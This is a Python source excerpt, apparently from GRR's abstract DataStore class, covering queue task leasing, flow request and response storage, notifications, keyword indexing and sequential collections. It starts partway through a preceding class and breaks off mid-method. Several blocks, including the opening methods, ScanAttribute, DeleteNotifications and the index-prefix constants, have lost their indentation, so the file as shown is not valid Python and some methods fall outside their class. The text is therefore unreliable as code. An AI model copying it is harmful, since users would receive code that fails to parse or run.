self.DeleteAttributes(queue, predicates)
def QueueScheduleTasks(self, tasks, timestamp):
for queue, queued_tasks in iteritems(
collection.Group(tasks, lambda x: x.queue)):
to_schedule = {}
for task in queued_tasks:
to_schedule[DataStore.QueueTaskIdToColumn(
task.task_id)] = [task.SerializeToString()]
self.MultiSet(queue, to_schedule, timestamp=timestamp)
def QueueQueryAndOwn(self, queue, lease_seconds, limit, timestamp):
"""Returns a list of Tasks leased for a certain time.
Args:
queue: The queue to query from.
lease_seconds: The tasks will be leased for this long.
limit: Number of values to fetch.
timestamp: Range of times for consideration.
Returns:
A list of GrrMessage() objects leased.
"""
# Do the real work in a transaction
try:
lock = DB.LockRetryWrapper(queue, lease_time=lease_seconds)
return self._QueueQueryAndOwn(
lock.subject,
lease_seconds=lease_seconds,
limit=limit,
timestamp=timestamp)
except DBSubjectLockError:
# This exception just means that we could not obtain the lock on the queue
# so we just return an empty list, let the worker sleep and come back to
# fetch more tasks.
return []
except Error as e:
logging.warning("Datastore exception: %s", e)
return []
def _QueueQueryAndOwn(self,
subject,
lease_seconds=100,
limit=1,
timestamp=None):
"""Business logic helper for QueueQueryAndOwn()."""
tasks = []
lease = int(lease_seconds * 1e6)
# Only grab attributes with timestamps in the past.
delete_attrs = set()
serialized_tasks_dict = {}
for predicate, task, timestamp in DB.ResolvePrefix(
subject,
DataStore.QUEUE_TASK_PREDICATE_PREFIX,
timestamp=(0, timestamp or rdfvalue.RDFDatetime.Now())):
task = rdf_flows.GrrMessage.FromSerializedString(task)
task.leased_until = timestamp
task.leased_by = utils.ProcessIdString()
# Decrement the ttl
task.task_ttl -= 1
if task.task_ttl <= 0:
# Remove the task if ttl is exhausted.
delete_attrs.add(predicate)
stats_collector_instance.Get().IncrementCounter(
"grr_task_ttl_expired_count")
else:
if task.task_ttl != rdf_flows.GrrMessage.max_ttl - 1:
stats_collector_instance.Get().IncrementCounter(
"grr_task_retransmission_count")
serialized_tasks_dict.setdefault(predicate,
[]).append(task.SerializeToString())
tasks.append(task)
if len(tasks) >= limit:
break
if delete_attrs or serialized_tasks_dict:
# Update the timestamp on claimed tasks to be in the future and decrement
# their TTLs, delete tasks with expired ttls.
self.MultiSet(
subject,
serialized_tasks_dict,
replace=True,
timestamp=int(time.time() * 1e6) + lease,
to_delete=delete_attrs)
if delete_attrs:
logging.info("TTL exceeded for %d messages on queue %s",
len(delete_attrs), subject)
return tasks
def LabelUpdateLabels(self, subject, new_labels, to_delete):
new_attributes = {}
for label in new_labels:
new_attributes[DataStore.LABEL_ATTRIBUTE_TEMPLATE % label] = (
DataStore.EMPTY_DATA_PLACEHOLDER)
delete_attributes = [
DataStore.LABEL_ATTRIBUTE_TEMPLATE % label for label in to_delete
]
if new_attributes or delete_attributes:
self.MultiSet(
subject, new_attributes, to_delete=delete_attributes, timestamp=0)
def FileHashIndexAddItem(self, subject, file_path):
predicate = (DataStore.FILE_HASH_TEMPLATE % file_path).lower()
self.MultiSet(subject, {predicate: [file_path]})
def AFF4AddChild(self, subject, child, extra_attributes=None):
"""Adds a child to the specified parent."""
precondition.AssertType(child, Text)
attributes = {
DataStore.AFF4_INDEX_DIR_TEMPLATE % child: [
DataStore.EMPTY_DATA_PLACEHOLDER
]
}
if extra_attributes:
attributes.update(extra_attributes)
self.MultiSet(subject, attributes)
def AFF4DeleteChild(self, subject, child):
self.DeleteAttributes(
subject, [DataStore.AFF4_INDEX_DIR_TEMPLATE % utils.SmartStr(child)])
class DataStore(with_metaclass(registry.MetaclassRegistry, object)):
  """Abstract database access."""
  # Constants relating to timestamps.
  ALL_TIMESTAMPS = "ALL_TIMESTAMPS"
  NEWEST_TIMESTAMP = "NEWEST_TIMESTAMP"
  TIMESTAMPS = [ALL_TIMESTAMPS, NEWEST_TIMESTAMP]
  LEASE_ATTRIBUTE = "aff4:lease"
  # Attribute name templates for queue notifications.
  NOTIFY_PREDICATE_PREFIX = "notify:"
  NOTIFY_PREDICATE_TEMPLATE = NOTIFY_PREDICATE_PREFIX + "%s"
  # Attribute name templates for flow request/status/response records.
  FLOW_REQUEST_PREFIX = "flow:request:"
  FLOW_REQUEST_TEMPLATE = FLOW_REQUEST_PREFIX + "%08X"
  FLOW_STATUS_TEMPLATE = "flow:status:%08X"
  FLOW_STATUS_PREFIX = "flow:status:"
  FLOW_RESPONSE_PREFIX = "flow:response:"
  FLOW_RESPONSE_TEMPLATE = FLOW_RESPONSE_PREFIX + "%08X:%08X"
  # Attribute name templates for label, file-hash and directory indexes.
  LABEL_ATTRIBUTE_PREFIX = "index:label_"
  LABEL_ATTRIBUTE_TEMPLATE = "index:label_%s"
  # Placeholder stored when only the attribute's existence matters.
  EMPTY_DATA_PLACEHOLDER = "X"
  FILE_HASH_PREFIX = "index:target:"
  FILE_HASH_TEMPLATE = "index:target:%s"
  AFF4_INDEX_DIR_PREFIX = "index:dir/"
  AFF4_INDEX_DIR_TEMPLATE = "index:dir/%s"
  # Concrete datastores may override the mutation pool implementation.
  mutation_pool_cls = MutationPool
  # Background threads; created lazily (see __init__ and
  # InitializeMonitorThread).
  flusher_thread = None
  enable_flusher_thread = True
  monitor_thread = None
  def __init__(self):
    """Starts the background flusher thread unless running under tests."""
    # "Test Context" in the config context signals a test run; flushing is
    # then left to the test harness.
    in_test = "Test Context" in config.CONFIG.context
    if not in_test and self.enable_flusher_thread:
      # Start the flusher thread.
      self.flusher_thread = utils.InterruptableThread(
          name="DataStore flusher thread", target=self.Flush, sleep_time=0.5)
      self.flusher_thread.start()
    self.monitor_thread = None
  def InitializeMonitorThread(self):
    """Start the thread that registers the size of the DataStore."""
    # Idempotent: a second call is a no-op.
    if self.monitor_thread:
      return
    self.monitor_thread = utils.InterruptableThread(
        name="DataStore monitoring thread",
        target=self._RegisterSize,
        sleep_time=60)
    self.monitor_thread.start()
  @classmethod
  def SetupTestDB(cls):
    """Prepares the class for tests by disabling the flusher thread."""
    cls.enable_flusher_thread = False
  def ClearTestDB(self):
    """Clears test data; no-op here, overridden by concrete datastores."""
    pass
  def DestroyTestDB(self):
    """Destroys the test DB; no-op here, overridden by concrete datastores."""
    pass
  def _RegisterSize(self):
    """Measures size of DataStore."""
    stats_collector_instance.Get().SetGaugeValue("datastore_size", self.Size())
  def Initialize(self):
    """Initialization of the datastore."""
    # Intentionally empty; concrete datastores override as needed.
  @abc.abstractmethod
  def DeleteSubject(self, subject, sync=False):
    """Completely deletes all information about this subject."""
  def DeleteSubjects(self, subjects, sync=False):
    """Delete multiple subjects at once."""
    # Default implementation deletes one-by-one; datastores may override
    # with a batched version.
    for subject in subjects:
      self.DeleteSubject(subject, sync=sync)
  def Set(self,
          subject,
          attribute,
          value,
          timestamp=None,
          replace=True,
          sync=True):
    """Set a single value for this subject's attribute.
    Args:
      subject: The subject this applies to.
      attribute: Attribute name.
      value: serialized value into one of the supported types.
      timestamp: The timestamp for this entry in microseconds since the epoch.
        If None means now.
      replace: Bool whether or not to overwrite current records.
      sync: If true we ensure the new values are committed before returning.
    """
    # TODO(user): don't allow subject = None
    # Thin convenience wrapper over MultiSet with a single-entry dict.
    self.MultiSet(
        subject, {attribute: [value]},
        timestamp=timestamp,
        replace=replace,
        sync=sync)
  def LockRetryWrapper(self,
                       subject,
                       retrywrap_timeout=1,
                       retrywrap_max_timeout=10,
                       blocking=True,
                       lease_time=None):
    """Retry a DBSubjectLock until it succeeds.
    Args:
      subject: The subject which the lock applies to.
      retrywrap_timeout: How long to wait before retrying the lock.
      retrywrap_max_timeout: The maximum time to wait for a retry until we
        raise.
      blocking: If False, raise on first lock failure.
      lease_time: lock lease time in seconds.
    Returns:
      The DBSubjectLock object
    Raises:
      DBSubjectLockError: If the maximum retry count has been reached.
    """
    # `timeout` accumulates total time slept so far across retries.
    timeout = 0
    while timeout < retrywrap_max_timeout:
      try:
        return self.DBSubjectLock(subject, lease_time=lease_time)
      except DBSubjectLockError:
        if not blocking:
          raise
        stats_collector_instance.Get().IncrementCounter("datastore_retries")
        time.sleep(retrywrap_timeout)
        timeout += retrywrap_timeout
    raise DBSubjectLockError("Retry number exceeded.")
  @abc.abstractmethod
  def DBSubjectLock(self, subject, lease_time=None):
    """Returns a DBSubjectLock object for a subject.
    This opens a read/write lock to the subject. Any read access to the subject
    will have a consistent view between threads. Any attempts to write to the
    subject must be performed under lock. DBSubjectLocks may fail and raise the
    DBSubjectLockError() exception.
    Users should almost always call LockRetryWrapper() to retry if the lock
    isn't obtained on the first try.
    Args:
      subject: The subject which the lock applies to. Only a single subject
        may be locked in a lock.
      lease_time: The minimum amount of time the lock should remain alive.
    Returns:
      A lock object.
    """
  @abc.abstractmethod
  def MultiSet(self,
               subject,
               values,
               timestamp=None,
               replace=True,
               sync=True,
               to_delete=None):
    """Set multiple attributes' values for this subject in one operation.
    Args:
      subject: The subject this applies to.
      values: A dict with keys containing attributes and values, serializations
        to be set. values can be a tuple of (value, timestamp). Value must be
        one of the supported types.
      timestamp: The timestamp for this entry in microseconds since the epoch.
        None means now.
      replace: Bool whether or not to overwrite current records.
      sync: If true we block until the operation completes.
      to_delete: An array of attributes to clear prior to setting.
    """
  def MultiDeleteAttributes(self,
                            subjects,
                            attributes,
                            start=None,
                            end=None,
                            sync=True):
    """Remove all specified attributes from a list of subjects.
    Args:
      subjects: The list of subjects that will have these attributes removed.
      attributes: A list of attributes.
      start: A timestamp, attributes older than start will not be deleted.
      end: A timestamp, attributes newer than end will not be deleted.
      sync: If true we block until the operation completes.
    """
    # Default implementation deletes per-subject; datastores may override.
    for subject in subjects:
      self.DeleteAttributes(
          subject, attributes, start=start, end=end, sync=sync)
  @abc.abstractmethod
  def DeleteAttributes(self,
                       subject,
                       attributes,
                       start=None,
                       end=None,
                       sync=True):
    """Remove all specified attributes.
    Args:
      subject: The subject that will have these attributes removed.
      attributes: A list of attributes.
      start: A timestamp, attributes older than start will not be deleted.
      end: A timestamp, attributes newer than end will not be deleted.
      sync: If true we block until the operation completes.
    """
  def Resolve(self, subject, attribute):
    """Retrieve a value set for a subject's attribute.
    This method is easy to use but always gets the latest version of the
    attribute. It is more flexible and efficient to use the other Resolve
    methods.
    Args:
      subject: The subject URN.
      attribute: The attribute.
    Returns:
      A (value, timestamp in microseconds) stored in the datastore cell, or
      (None, 0). Value will be the same type as originally stored with Set().
    Raises:
      AccessError: if anything goes wrong.
    """
    for _, value, timestamp in self.ResolveMulti(
        subject, [attribute], timestamp=self.NEWEST_TIMESTAMP):
      # Just return the first one.
      return value, timestamp
    # No results: the loop body never executed.
    return (None, 0)
  @abc.abstractmethod
  def MultiResolvePrefix(self,
                         subjects,
                         attribute_prefix,
                         timestamp=None,
                         limit=None):
    """Generate a set of values matching for subjects' attribute.
    This method provides backwards compatibility for the old method of
    specifying regexes. Each datastore can move to prefix matching by
    overriding this method and ResolvePrefix below.
    Args:
      subjects: A list of subjects.
      attribute_prefix: The attribute prefix.
      timestamp: A range of times for consideration (In microseconds). Can be a
        constant such as ALL_TIMESTAMPS or NEWEST_TIMESTAMP or a tuple of ints
        (start, end). Inclusive of both lower and upper bounds.
      limit: The total number of result values to return.
    Returns:
      A dict keyed by subjects, with values being a list of (attribute, value
      string, timestamp).
      Values with the same attribute (happens when timestamp is not
      NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
      to be ordered in the decreasing timestamp order.
    Raises:
      AccessError: if anything goes wrong.
    """
  def ResolvePrefix(self, subject, attribute_prefix, timestamp=None,
                    limit=None):
    """Retrieve a set of value matching for this subject's attribute.
    Args:
      subject: The subject that we will search.
      attribute_prefix: The attribute prefix.
      timestamp: A range of times for consideration (In microseconds). Can be a
        constant such as ALL_TIMESTAMPS or NEWEST_TIMESTAMP or a tuple of ints
        (start, end).
      limit: The number of results to fetch.
    Returns:
      A list of (attribute, value string, timestamp).
      Values with the same attribute (happens when timestamp is not
      NEWEST_TIMESTAMP, but ALL_TIMESTAMPS or time range) are guaranteed
      to be ordered in the decreasing timestamp order.
    Raises:
      AccessError: if anything goes wrong.
    """
    # Only the first (and only) subject's values are used; the early return
    # exits after one iteration.
    for _, values in self.MultiResolvePrefix([subject],
                                             attribute_prefix,
                                             timestamp=timestamp,
                                             limit=limit):
      values.sort(key=lambda a: a[0])
      return values
    return []
  @abc.abstractmethod
  def ResolveMulti(self, subject, attributes, timestamp=None, limit=None):
    """Resolve multiple attributes for a subject.
    Results may be in unsorted order.
    Args:
      subject: The subject to resolve.
      attributes: The attribute string or list of strings to match. Note this is
        an exact match, not a regex.
      timestamp: A range of times for consideration (In microseconds). Can be a
        constant such as ALL_TIMESTAMPS or NEWEST_TIMESTAMP or a tuple of ints
        (start, end).
      limit: The maximum total number of results we return.
    """
  def ResolveRow(self, subject, **kw):
    """Returns all attributes of a subject (prefix match on "")."""
    return self.ResolvePrefix(subject, "", **kw)
  @abc.abstractmethod
  def Flush(self):
    """Flushes the DataStore."""
  def Size(self):
    """DataStore size in bytes."""
    # -1 means "unknown"; concrete datastores override with a real value.
    return -1
  def __del__(self):
    """Stops background threads and attempts a final flush on teardown."""
    if self.flusher_thread:
      self.flusher_thread.Stop()
    if self.monitor_thread:
      self.monitor_thread.Stop()
    try:
      self.Flush()
    except Exception:  # pylint: disable=broad-except
      # Best-effort: never raise from a destructor.
      pass
  def _CleanSubjectPrefix(self, subject_prefix):
    """Normalizes a subject prefix to an RDFURN string ending in "/"."""
    subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix))
    if subject_prefix[-1] != "/":
      subject_prefix += "/"
    return subject_prefix
  def _CleanAfterURN(self, after_urn, subject_prefix):
    """Stringifies after_urn and validates it lies under subject_prefix."""
    if after_urn:
      after_urn = utils.SmartStr(after_urn)
      if not after_urn.startswith(subject_prefix):
        raise ValueError("after_urn \"%s\" does not begin with prefix \"%s\"" %
                         (after_urn, subject_prefix))
    return after_urn
  @abc.abstractmethod
  def ScanAttributes(self,
                     subject_prefix,
                     attributes,
                     after_urn=None,
                     max_records=None,
                     relaxed_order=False):
    """Scan for values of multiple attributes across a range of rows.
    Scans rows for values of attribute. Reads the most recent value stored in
    each row.
    Args:
      subject_prefix: Subject beginning with this prefix can be scanned. Must be
        an aff4 object and a directory - "/" will be appended if necessary. User
        must have read and query permissions on this directory.
      attributes: A list of attribute names to scan.
      after_urn: If set, only scan records which come after this urn.
      max_records: The maximum number of records to scan.
      relaxed_order: By default, ScanAttribute yields results in lexicographic
        order. If this is set, a datastore may yield results in a more
        convenient order. For certain datastores this might greatly increase the
        performance of large scans.
    Yields: Pairs (subject, result_dict) where result_dict maps attribute to
      (timestamp, value) pairs.
    """
def ScanAttribute(self,
subject_prefix,
attribute,
after_urn=None,
max_records=None,
relaxed_order=False):
for s, r in self.ScanAttributes(
subject_prefix, [attribute],
after_urn=after_urn,
max_records=max_records,
relaxed_order=relaxed_order):
ts, v = r[attribute]
yield (s, ts, v)
  def GetMutationPool(self):
    """Returns a fresh mutation pool of the configured pool class."""
    return self.mutation_pool_cls()
  def CreateNotifications(self, queue_shard, notifications):
    """Writes notifications to a queue shard, keyed by session id."""
    values = {}
    for notification in notifications:
      values[self.NOTIFY_PREDICATE_TEMPLATE % notification.session_id] = [
          (notification.SerializeToString(), notification.timestamp)
      ]
    # replace=False keeps multiple notifications per session id.
    self.MultiSet(queue_shard, values, replace=False, sync=True)
def DeleteNotifications(self, queue_shards, session_ids, start, end):
attributes = [
self.NOTIFY_PREDICATE_TEMPLATE % session_id
for session_id in session_ids
]
self.MultiDeleteAttributes(
queue_shards, attributes, start=start, end=end, sync=True)
  def GetNotifications(self, queue_shard, end, limit=10000):
    """Yields parsed notifications from a queue shard up to timestamp `end`.
    Unparseable notifications are deleted from the shard and skipped.
    """
    for predicate, serialized_notification, ts in self.ResolvePrefix(
        queue_shard,
        self.NOTIFY_PREDICATE_PREFIX,
        timestamp=(0, end),
        limit=limit):
      try:
        # Parse the notification.
        notification = rdf_flows.GrrNotification.FromSerializedString(
            serialized_notification)
      except Exception:  # pylint: disable=broad-except
        logging.exception(
            "Can't unserialize notification, deleting it: "
            "predicate=%s, ts=%d", predicate, ts)
        self.DeleteAttributes(
            queue_shard,
            [predicate],
            # Make the time range narrow, but be sure to include the needed
            # notification.
            start=ts,
            end=ts,
            sync=True)
        continue
      # Strip the prefix from the predicate to get the session_id.
      session_id = predicate[len(self.NOTIFY_PREDICATE_PREFIX):]
      notification.session_id = session_id
      notification.timestamp = ts
      yield notification
  def GetFlowResponseSubject(self, session_id, request_id):
    """The subject used to carry all the responses for a specific request_id."""
    return session_id.Add("state/request:%08X" % request_id)
  def ReadRequestsAndResponses(self,
                               session_id,
                               timestamp=None,
                               request_limit=None,
                               response_limit=None):
    """Fetches all Requests and Responses for a given session_id."""
    subject = session_id.Add("state")
    requests = {}
    # Get some requests.
    for predicate, serialized, _ in self.ResolvePrefix(
        subject,
        self.FLOW_REQUEST_PREFIX,
        limit=request_limit,
        timestamp=timestamp):
      # predicate is "flow:request:<id>"; keep "request:<id>" as the subpath
      # so the key matches GetFlowResponseSubject's "state/request:<id>".
      request_id = predicate.split(":", 1)[1]
      requests[str(subject.Add(request_id))] = serialized
    # And the responses for them.
    response_data = dict(
        self.MultiResolvePrefix(
            list(iterkeys(requests)),
            self.FLOW_RESPONSE_PREFIX,
            limit=response_limit,
            timestamp=timestamp))
    for urn, request_data in sorted(iteritems(requests)):
      request = rdf_flow_runner.RequestState.FromSerializedString(request_data)
      responses = []
      for _, serialized, timestamp in response_data.get(urn, []):
        msg = rdf_flows.GrrMessage.FromSerializedString(serialized)
        msg.timestamp = timestamp
        responses.append(msg)
      # Responses are returned ordered by response_id.
      yield (request, sorted(responses, key=lambda msg: msg.response_id))
  def ReadCompletedRequests(self, session_id, timestamp=None, limit=None):
    """Fetches all the requests with a status message queued for them."""
    subject = session_id.Add("state")
    requests = {}
    status = {}
    # Read both request and status records in a single prefix query.
    for predicate, serialized, _ in self.ResolvePrefix(
        subject, [self.FLOW_REQUEST_PREFIX, self.FLOW_STATUS_PREFIX],
        limit=limit,
        timestamp=timestamp):
      # Predicates look like "flow:request:<id>" or "flow:status:<id>".
      parts = predicate.split(":", 3)
      request_id = parts[2]
      if parts[1] == "status":
        status[request_id] = serialized
      else:
        requests[request_id] = serialized
    for request_id, serialized in sorted(iteritems(requests)):
      # Only yield requests that have a matching status record.
      if request_id in status:
        yield (rdf_flow_runner.RequestState.FromSerializedString(serialized),
               rdf_flows.GrrMessage.FromSerializedString(status[request_id]))
  def ReadResponsesForRequestId(self, session_id, request_id, timestamp=None):
    """Reads responses for one request.
    Args:
      session_id: The session id to use.
      request_id: The id of the request.
      timestamp: A timestamp as used in the data store.
    Yields:
      fetched responses for the request
    """
    request = rdf_flow_runner.RequestState(id=request_id, session_id=session_id)
    # ReadResponses yields (request, responses); return the responses of the
    # single synthesized request. Returns None if ReadResponses is empty.
    for _, responses in self.ReadResponses([request], timestamp=timestamp):
      return responses
  def ReadResponses(self, request_list, timestamp=None):
    """Reads responses for multiple requests at the same time.
    Args:
      request_list: The list of requests the responses should be fetched for.
      timestamp: A timestamp as used in the data store.
    Yields:
      tuples (request, lists of fetched responses for the request)
    """
    # Map each response subject back to the request it belongs to.
    response_subjects = {}
    for request in request_list:
      response_subject = self.GetFlowResponseSubject(request.session_id,
                                                     request.id)
      response_subjects[response_subject] = request
    response_data = dict(
        self.MultiResolvePrefix(
            response_subjects, self.FLOW_RESPONSE_PREFIX, timestamp=timestamp))
    for response_urn, request in sorted(iteritems(response_subjects)):
      responses = []
      for _, serialized, timestamp in response_data.get(response_urn, []):
        msg = rdf_flows.GrrMessage.FromSerializedString(serialized)
        msg.timestamp = timestamp
        responses.append(msg)
      # Responses are yielded ordered by response_id.
      yield (request, sorted(responses, key=lambda msg: msg.response_id))
  def StoreRequestsAndResponses(self,
                                new_requests=None,
                                new_responses=None,
                                requests_to_delete=None):
    """Stores new flow requests and responses to the data store.
    Args:
      new_requests: A list of tuples (request, timestamp) to store in the data
        store.
      new_responses: A list of tuples (response, timestamp) to store in the data
        store.
      requests_to_delete: A list of requests that should be deleted from the
        data store.
    """
    # to_write maps subject -> {attribute: [(serialized, timestamp), ...]}.
    to_write = {}
    if new_requests is not None:
      for request, timestamp in new_requests:
        subject = request.session_id.Add("state")
        queue = to_write.setdefault(subject, {})
        queue.setdefault(self.FLOW_REQUEST_TEMPLATE % request.id, []).append(
            (request.SerializeToString(), timestamp))
    if new_responses is not None:
      for response, timestamp in new_responses:
        # Status messages cause their requests to be marked as complete. This
        # allows us to quickly enumerate all the completed requests - it is
        # essentially an index for completed requests.
        if response.type == rdf_flows.GrrMessage.Type.STATUS:
          subject = response.session_id.Add("state")
          attribute = self.FLOW_STATUS_TEMPLATE % response.request_id
          to_write.setdefault(subject, {}).setdefault(attribute, []).append(
              (response.SerializeToString(), timestamp))
        subject = self.GetFlowResponseSubject(response.session_id,
                                              response.request_id)
        attribute = self.FLOW_RESPONSE_TEMPLATE % (response.request_id,
                                                   response.response_id)
        to_write.setdefault(subject, {}).setdefault(attribute, []).append(
            (response.SerializeToString(), timestamp))
    # to_delete maps subject -> [attributes to clear].
    to_delete = {}
    if requests_to_delete is not None:
      for request in requests_to_delete:
        queue = to_delete.setdefault(request.session_id.Add("state"), [])
        queue.append(self.FLOW_REQUEST_TEMPLATE % request.id)
        queue.append(self.FLOW_STATUS_TEMPLATE % request.id)
    # One MultiSet per subject applies both the writes and the deletes.
    for subject in set(to_write) | set(to_delete):
      self.MultiSet(
          subject,
          to_write.get(subject, {}),
          to_delete=to_delete.get(subject, []),
          sync=True)
  def CheckRequestsForCompletion(self, requests):
    """Checks if there is a status message queued for a number of requests."""
    subjects = [r.session_id.Add("state") for r in requests]
    # Maps state subject -> set of request ids that have a status record.
    statuses_found = {}
    for subject, result in self.MultiResolvePrefix(subjects,
                                                   self.FLOW_STATUS_PREFIX):
      for predicate, _, _ in result:
        # The request id is the hex suffix of "flow:status:<id>".
        request_nr = int(predicate.split(":")[-1], 16)
        statuses_found.setdefault(subject, set()).add(request_nr)
    status_available = set()
    for r in requests:
      if r.request_id in statuses_found.get(r.session_id.Add("state"), set()):
        status_available.add(r)
    return status_available
  def DeleteRequest(self, request):
    """Deletes a single request; convenience wrapper over DeleteRequests."""
    return self.DeleteRequests([request])
  def DeleteRequests(self, requests):
    """Deletes all responses stored for the given requests."""
    # Efficiently drop all responses to this request.
    subjects = [
        self.GetFlowResponseSubject(request.session_id, request.id)
        for request in requests
    ]
    self.DeleteSubjects(subjects, sync=True)
  def DestroyFlowStates(self, session_id):
    """Deletes all requests and responses of one flow; see MultiDestroy."""
    return self.MultiDestroyFlowStates([session_id])
  def MultiDestroyFlowStates(self, session_ids, request_limit=None):
    """Deletes all requests and responses for the given flows.
    Args:
      session_ids: A lists of flows to destroy.
      request_limit: A limit on the number of requests to delete.
    Returns:
      A list of requests that were deleted.
    """
    subjects = [session_id.Add("state") for session_id in session_ids]
    to_delete = []
    deleted_requests = []
    for subject, values in self.MultiResolvePrefix(
        subjects, self.FLOW_REQUEST_PREFIX, limit=request_limit):
      for _, serialized, _ in values:
        request = rdf_flow_runner.RequestState.FromSerializedString(serialized)
        deleted_requests.append(request)
        # Drop all responses to this request.
        response_subject = self.GetFlowResponseSubject(request.session_id,
                                                       request.id)
        to_delete.append(response_subject)
      # Mark the request itself for deletion.
      to_delete.append(subject)
    # Drop them all at once.
    self.DeleteSubjects(to_delete, sync=True)
    return deleted_requests
  def DeleteWellKnownFlowResponses(self, session_id, responses):
    """Deletes given responses from a well-known flow's request:00000000."""
    # Well-known flows store all responses under request id 0.
    subject = session_id.Add("state/request:00000000")
    predicates = []
    for response in responses:
      predicates.append(self.FLOW_RESPONSE_TEMPLATE % (response.request_id,
                                                       response.response_id))
    self.DeleteAttributes(subject, predicates, sync=True, start=0)
  def FetchResponsesForWellKnownFlow(self, session_id, response_limit,
                                     timestamp):
    """Yields parsed responses stored under a well-known flow's request 0."""
    subject = session_id.Add("state/request:00000000")
    # NOTE: the loop variable `timestamp` shadows the parameter; the
    # parameter is consumed by ResolvePrefix before the loop rebinds it.
    for _, serialized, timestamp in sorted(
        self.ResolvePrefix(
            subject,
            self.FLOW_RESPONSE_PREFIX,
            limit=response_limit,
            timestamp=timestamp)):
      msg = rdf_flows.GrrMessage.FromSerializedString(serialized)
      msg.timestamp = timestamp
      yield msg
# Index handling.
_INDEX_PREFIX = "kw_index:"
_INDEX_PREFIX_LEN = len(_INDEX_PREFIX)
_INDEX_COLUMN_FORMAT = _INDEX_PREFIX + "%s"
  def _KeywordToURN(self, urn, keyword):
    """Returns the index row urn for a keyword under the index base urn."""
    return urn.Add(keyword)
  def IndexAddKeywordsForName(self, index_urn, name, keywords):
    """Associates `name` with each keyword in the index at the current time."""
    timestamp = rdfvalue.RDFDatetime.Now().AsMicrosecondsSinceEpoch()
    with self.GetMutationPool() as mutation_pool:
      # set() de-duplicates keywords; the stored value is empty - only the
      # attribute name and timestamp carry information.
      for keyword in set(keywords):
        mutation_pool.Set(
            self._KeywordToURN(index_urn, keyword),
            self._INDEX_COLUMN_FORMAT % name,
            "",
            timestamp=timestamp)
  def IndexRemoveKeywordsForName(self, index_urn, name, keywords):
    """Removes the association of `name` with each keyword in the index."""
    with self.GetMutationPool() as mutation_pool:
      for keyword in set(keywords):
        mutation_pool.DeleteAttributes(
            self._KeywordToURN(index_urn, keyword),
            [self._INDEX_COLUMN_FORMAT % name])
  def IndexReadPostingLists(self,
                            index_urn,
                            keywords,
                            start_time,
                            end_time,
                            last_seen_map=None):
    """Finds all objects associated with any of the keywords.
    Args:
      index_urn: The base urn of the index.
      keywords: A collection of keywords that we are interested in.
      start_time: Only considers keywords added at or after this point in time.
      end_time: Only considers keywords at or before this point in time.
      last_seen_map: If present, is treated as a dict and populated to map pairs
        (keyword, name) to the timestamp of the latest connection found.
    Returns:
      A dict mapping each keyword to a set of relevant names.
    """
    keyword_urns = {self._KeywordToURN(index_urn, k): k for k in keywords}
    result = {}
    for kw in keywords:
      result[kw] = set()
    # end_time + 1 makes the upper bound inclusive of end_time itself.
    for keyword_urn, value in self.MultiResolvePrefix(
        list(iterkeys(keyword_urns)),
        self._INDEX_PREFIX,
        timestamp=(start_time, end_time + 1)):
      for column, _, ts in value:
        kw = keyword_urns[keyword_urn]
        # The name is encoded in the column name after the index prefix.
        name = column[self._INDEX_PREFIX_LEN:]
        result[kw].add(name)
        if last_seen_map is not None:
          last_seen_map[(kw, name)] = max(last_seen_map.get((kw, name), -1), ts)
    return result
  # The largest possible suffix - maximum value expressible by 6 hex digits.
  COLLECTION_MAX_SUFFIX = 0xffffff

  # The attribute (column) where we store value.
  COLLECTION_ATTRIBUTE = "aff4:sequential_value"

  # An attribute name of the form "index:sc_<i>" at timestamp <t> indicates that
  # the item with record number i was stored at timestamp t. The timestamp
  # suffix is stored as the value.
  COLLECTION_INDEX_ATTRIBUTE_PREFIX = "index:sc_"

  # The attribute prefix to use when storing the index of stored types
  # for multi type collections.
  COLLECTION_VALUE_TYPE_PREFIX = "aff4:value_type_"

  # The attribute where we store locks. A lock is a timestamp indicating when
  # the lock becomes stale and the record may be claimed again.
  QUEUE_LOCK_ATTRIBUTE = "aff4:lease"

  QUEUE_TASK_PREDICATE_PREFIX = "task:"
  QUEUE_TASK_PREDICATE_TEMPLATE = QUEUE_TASK_PREDICATE_PREFIX + "%s"

  @classmethod
  def CollectionMakeURN(cls, urn, timestamp, suffix=None, subpath="Results"):
    """Builds a record URN of the form <urn>/<subpath>/<timestamp>.<suffix>.

    Returns:
      A tuple (result_urn, timestamp, suffix). The suffix is randomized when
      not supplied, making collisions between concurrent writers unlikely.
    """
    if suffix is None:
      # Disallow 0 so that subtracting 1 from a normal suffix doesn't require
      # special handling.
      suffix = random.randint(1, DataStore.COLLECTION_MAX_SUFFIX)
    result_urn = urn.Add(subpath).Add("%016x.%06x" % (timestamp, suffix))
    return (result_urn, timestamp, suffix)

  @classmethod
  def QueueTaskIdToColumn(cls, task_id):
    """Return a predicate representing the given task."""
    # Task ids are zero-padded to 8 digits so predicates sort lexically.
    return DataStore.QUEUE_TASK_PREDICATE_TEMPLATE % ("%08d" % task_id)
  def CollectionScanItems(self,
                          collection_id,
                          rdf_type,
                          after_timestamp=None,
                          after_suffix=None,
                          limit=None):
    """Scans the items of a sequential collection in storage order.

    Args:
      collection_id: RDFURN of the collection to scan.
      rdf_type: Type used to deserialize each stored value.
      after_timestamp: If set, yields only records stored after this point.
      after_suffix: Together with after_timestamp, identifies the exact record
        to resume after.
      limit: Maximum number of records to scan.

    Yields:
      Tuples (item, timestamp, suffix).
    """
    precondition.AssertType(collection_id, rdfvalue.RDFURN)

    after_urn = None
    if after_timestamp:
      # Resume strictly after the given record; defaulting the suffix to the
      # maximum value skips every record stored at after_timestamp when no
      # suffix is provided.
      after_urn = utils.SmartStr(
          self.CollectionMakeURN(
              collection_id,
              after_timestamp,
              suffix=after_suffix or self.COLLECTION_MAX_SUFFIX)[0])

    for subject, timestamp, serialized_rdf_value in self.ScanAttribute(
        str(collection_id.Add("Results")),
        self.COLLECTION_ATTRIBUTE,
        after_urn=after_urn,
        max_records=limit):
      item = rdf_type.FromSerializedString(serialized_rdf_value)
      item.age = timestamp
      # The urn is timestamp.suffix where suffix is 6 hex digits.
      suffix = int(str(subject)[-6:], 16)
      yield (item, timestamp, suffix)
  def CollectionReadIndex(self, collection_id):
    """Reads all index entries for the given collection.

    Args:
      collection_id: ID of the collection for which the indexes should be
        retrieved.

    Yields:
      Tuples (index, ts, suffix).
    """
    for (attr, value, ts) in self.ResolvePrefix(
        collection_id, self.COLLECTION_INDEX_ATTRIBUTE_PREFIX):
      # The record number is hex-encoded in the attribute name after the
